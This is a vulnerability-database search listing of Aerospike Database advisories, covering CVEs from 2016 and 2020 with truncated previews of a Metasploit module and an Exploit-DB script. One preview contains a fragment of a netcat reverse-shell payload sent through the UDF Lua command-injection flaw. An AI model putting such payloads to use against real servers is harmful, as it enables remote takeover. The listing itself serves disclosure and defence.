42 matches found
EUVD-2016-9872
Malware in sbrugna...
EUVD-2016-9874
Malware in sbrugna...
EUVD-2016-9870
Malware in sbrugna...
EUVD-2016-9871
Malware in sbrugna...
The vulnerability of the Java client of the Aerospike Database management system allows a hacker to execute arbitrary code.
The vulnerability of the Java client of the Aerospike Database management system is related to deficiencies in the deserialization mechanism. Exploiting this vulnerability allows a malicious actor to execute arbitrary code...
Aerospike Database UDF Lua Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Aerospike Database UDF Lua Code Execution', 'Description' = %q Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to...
Aerospike Database UDF Lua Code Execution Exploit
Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to call the os.execute Lua function. This Metasploit module creates a UDF utilizing this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This modu...
Aerospike Database UDF Lua Code Execution
Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to call the os.execute Lua function. This module creates a UDF utilising this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This module does not...
Aerospike Database 5.1.0.3 - OS Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
Aerospike Database 5.1.0.3 Remote Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
Exploit for OS Command Injection in Aerospike Aerospike_Server
CVE-2020-13151 POC Aerospike Database 5.1.0.3 Host Com...
Aerospike Database Server Client Message Memory Disclosure Vulnerability(CVE-2016-9050)
Summary An exploitable out-of-bounds read vulnerability exists in the client message-parsing functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause an out-of-bounds read resulting in disclosure of memory within the process, the same vulnerability can also be use...
Aerospike Database Server Client Batch Request Code Execution Vulnerability(CVE-2016-9051)
Summary An exploitable out-of-bounds write vulnerability exists in the batch transaction field parsing functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause an out-of-bounds write resulting in memory corruption which can lead to remote code execution. An attack...
Aerospike Database Server Fabric-Worker Socket-Loop Denial-of-Service Vulnerability(CVE-2016-9049)
Summary An exploitable denial-of-service vulnerability exists in the fabric-worker component of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server process to dereference a null pointer. An attacker can simply connect to a TCP port in order to trigger this...
Aerospike Database Server RW Fabric Message Particle Type Code Execution Vulnerability(CVE-2016-9053)
Summary An exploitable out-of-bounds indexing vulnerability exists within the RW fabric message particle type of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server to fetch a function table outside the bounds of an array resulting in remote code execution. An...
The vulnerability of the packet transfer function in the Aerospike Database Server of the Oracle Database database management system allows a hacker to execute arbitrary code.
The vulnerability of the packet transfer function in the Aerospike Database Server of the Oracle Database database management system is related to writing beyond the buffer boundaries. Exploiting this vulnerability allows a malicious actor to execute arbitrary code writing beyond the memory bound...
The vulnerability of the RW-message structure in the Aerospike Database Server of the Oracle Database database management system allows a perpetrator to execute arbitrary code.
The vulnerability of the RW-message structure in the Aerospike Database Server of the Oracle Database database management system is related to unvalidated array indexing. Exploiting this vulnerability allows a malicious actor to execute arbitrary code read from beyond the memory limit using a...
Aerospike Database Server Remote Code Execution Vulnerability (CNVD-2017-02468)
Aerospike Database Server is a distributed, scalable NoSQL database from Aerospike, Inc. A remote code execution vulnerability exists in Aerospike Database Server. An attacker could use this vulnerability to execute arbitrary code in an affected application, and a failed attack could result in a...
CVE-2016-9049
An exploitable denial-of-service vulnerability exists in the fabric-worker component of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server process to dereference a null pointer. An attacker can simply connect to a TCP port in order to trigger this vulnerability...
Null pointer dereference
An exploitable denial-of-service vulnerability exists in the fabric-worker component of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server process to dereference a null pointer. An attacker can simply connect to a TCP port in order to trigger this vulnerability...